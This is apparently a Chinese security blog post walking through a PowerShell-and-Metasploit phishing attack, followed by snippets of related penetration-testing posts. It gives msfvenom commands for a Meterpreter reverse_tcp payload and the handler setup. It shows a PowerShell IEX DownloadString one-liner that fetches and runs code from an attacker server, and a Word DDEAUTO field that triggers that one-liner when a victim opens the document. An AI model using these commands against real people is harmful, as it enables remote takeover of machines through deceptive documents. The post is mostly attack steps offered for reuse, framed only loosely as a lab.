<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    MSF&Powershell進行釣魚攻擊

    VSole2021-08-28 05:48:48

    一、Powershell配合MSF無文件攻擊

    實驗環境:

    本次實驗的大致過程如下:

       MSF生成payload并放到靶機能夠訪問的服務器上,攻擊者通過釣魚等方式使靶機執行powershell代碼,靶機反彈到msf監聽的端口上建立會話,由此攻擊者可以利用此會話完成攻擊控制靶機。

    實驗步驟:

    1. kali生成payload:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1121 -f psh-reflection >x.ps1
    

    # 生成名為x.ps1的windows/x64/meterpreter/reverse_tcp的payload

    2. msf 設置監聽

    msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1121run# msf開始監聽本機1121端口
    

    將剛剛生成的payload放到公網服務器,確保靶機能夠訪問。

    在靶機直接運行powershell腳本,實戰需要其他方式運行此代碼:

    powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps1')
    

    # 代碼中的地址為公網地址。通過word域代碼執行powershell腳本調用web服務器poayload

    下載到靶機內存中執行

    當靶機成功執行以上命令之后,msf會收到會話如下圖,此時已經成功建立會話,可控制靶機。實驗成功;

    二、Powershell配合word釣魚

     原理:

    新建word文檔,調用快捷鍵:CTRL+F9,填寫域代碼:

    {DDEAUTO C:\\windows\\system32\\cmd.exe "/k notepad.exe}
    

      然后保存word,再次打開時會執行代碼彈出記事本程序。word可以通過域代碼執行系統命令。本實驗利用word域調用powershell代碼從而建立會話,控制靶機。

    本次實驗的大致過程如下: 

     將MSF生成payload并放到公網(模擬)web服務器上,確保靶機能夠訪問。對靶機進行word釣魚攻擊。當靶機打開word文件,會下載powershell payload到本地并執行,從而建立會話進行無文件攻擊。

    實驗步驟:

    1. kali生成ps腳本:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1122 -f psh-reflection >x.ps2
    

    # 生成名為x.ps2的windows/x64/meterpreter/reverse_tcp的payload

        2. msf 設置監聽

    msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1122run# msf開始監聽本機1122端口
    

       3.將生成的payload放到公網服務器,確保靶機能夠訪問。

       4.在本地新建word文檔設置域(快捷鍵:CTRL+F9),域內代碼為:

    DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps2') "
    

       5.通過釣魚等方式將該word文檔發送到靶機誘使靶機點擊文檔。成功建立會話,可控制靶機。實驗成功

    payloadmsf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    MSF生成payload并放到靶機能夠訪問的服務器上,攻擊者通過釣魚等方式使靶機執行powershell代碼,靶機反彈到msf監聽的端口上建立會話,由此攻擊者可以利用此會話完成攻擊控制靶機。
    metasploit淺析
    2023-05-30 09:07:26
    # Available formats are :process_image, :dylib, :dylib_sha1 and :exec. # 替換對應位置內容,查詢知應為rdata區。然后調用payload_generator中的format_payload得到最終的payload可執行程序。其完整內容如下: "\x31\xdb" + # xor ebx,ebx
    記一次網站滲透過程
    2022-09-13 08:37:27
    前幾天記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。
    一、序言 記錄某一次無意點開的一個小網站的滲透過程,幸運的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網上找了資料,成功getshell并獲取服務器權限。 二、滲透過程 1. 無意點開一個網站,發現網站比較小,且看起來比較老,然后發現logo沒有改,于是乎去百度搜索這個cms,發現有通用漏洞,這里貼一個鏈接:Beecms 通用漏洞(https://lin
    docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1. 如XSS,XSRF,sql注入,代碼執行,命令執行,越權訪問,目錄讀取,任意文件讀取,下載,文件包含,遠程命令執行,弱口令,上傳,編輯器漏洞,暴力破解等驗證碼與郵箱以及token的返回泄露,以及后臺為校驗從而可刪除的參數。從某個成功請求中捕獲數據包觀察cookie或者token是否存在規律或加密。token的key參數解密構建獲取真實user密鑰,可拼接、規律、時間戳……winodws桌面:TeamViewerQS單文件windows下載文件;certutil -urlcache -split -f?
    概述滲透測試的目標可以是單個主機,也可以是整個內網。在實戰中,比如最近如火如荼的HW行動,更多的是對一個目標的內網進行滲透,爭取獲得所有有價值的資產。完整的內網滲透涉及的步驟如下圖所示。快速橫向移動到到內網中的核心資產,獲取核心敏感數據和權限,完成一次疼痛的打擊。Step 1 信息收集完成邊界突破的第一步是目標對象資產的信息收集。這些其實是為了找到脆弱資產進行攻擊,畢竟“柿子挑軟的捏”。
    在實戰中,比如最近如火如荼的HW行動,更多的是對一個目標的內網進行滲透,爭取獲得所有有價值的資產。快速橫向移動到到內網中的核心資產,獲取核心敏感數據和權限,完成一次疼痛的打擊。這些其實是為了找到脆弱資產進行攻擊,畢竟“柿子挑軟的捏”。
    內網滲透-代理篇
    2021-12-01 05:44:01
    利用代理工具將內網的流量代理到本地進行訪問,這樣就可以對內網進行下一步滲透,同時也可以利用代理工具將其他網段的流量轉發到本地進行縱向滲透。代理的本質是Socks協議(防火墻安全會話轉換協議),工作在OSI參考模型的第5層(會話層)。使用TCP協議傳輸數據,因而不提供如傳遞ICMP信息之類的網絡層相關服務。目前支持SOCKS4和SOCKS5兩個版本:
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类